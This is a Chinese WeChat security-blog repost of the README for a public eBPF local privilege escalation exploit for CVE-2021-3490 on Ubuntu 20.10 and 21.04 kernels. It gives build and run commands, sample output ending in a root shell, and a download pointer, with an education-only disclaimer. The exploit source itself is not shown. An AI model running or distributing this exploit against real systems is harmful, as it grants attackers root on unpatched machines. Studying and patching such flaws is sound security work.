点击上方蓝字“Ots安全”一起玩耍
Linux_LPE_eBPF_CVE-2021-3490
针对 CVE-2021-3490 的 LPE 漏洞利用。在 Ubuntu 20.10 (Groovy Gorilla) 内核 5.8.0-25.26 到 5.8.0-52.58 上测试。和 Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17。该漏洞由 Manfred Paul @_manfp发现并在此提交中修复。
作者:@chompie1337
仅用于教育/研究目的。使用风险自负。
用法:
为 Ubuntu 20.10 (Groovy Gorilla) 构建:
make groovy
为 Ubuntu 21.04 (Hirsute Hippo) 构建:
make hirsute
跑步:
bin/exploit.bin
[ ] eBPF enabled, maps created!
[ ] addr of oob BPF array map: ffffa008c1202110
[ ] addr of array_map_ops: ffffffff956572a0
[ ] kernel read successful!
[for init_pid_ns in kstrtab ... ] searching
[in kstrtab: ffffffff95b03a4a ] addr of init_pid_ns
[for init_pid_ns in ksymtab... ] searching
[ ] addr of init_pid_ns ffffffff96062d00
[for creds for pid: 770 ] searching
[ ] addr of cred structure: ffffa0086758dec0
[ ] preparing to overwrite creds...
[ ] success! enjoy r00t :)
注意:您必须通过键入exit执行清理并避免内核崩溃来干净地退出 root shell 。
工具地址下载 - 点击阅读原文
本文始发于微信公众号(Ots安全):【漏洞利用】CVE-2021-3490 的 LPE 漏洞利用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论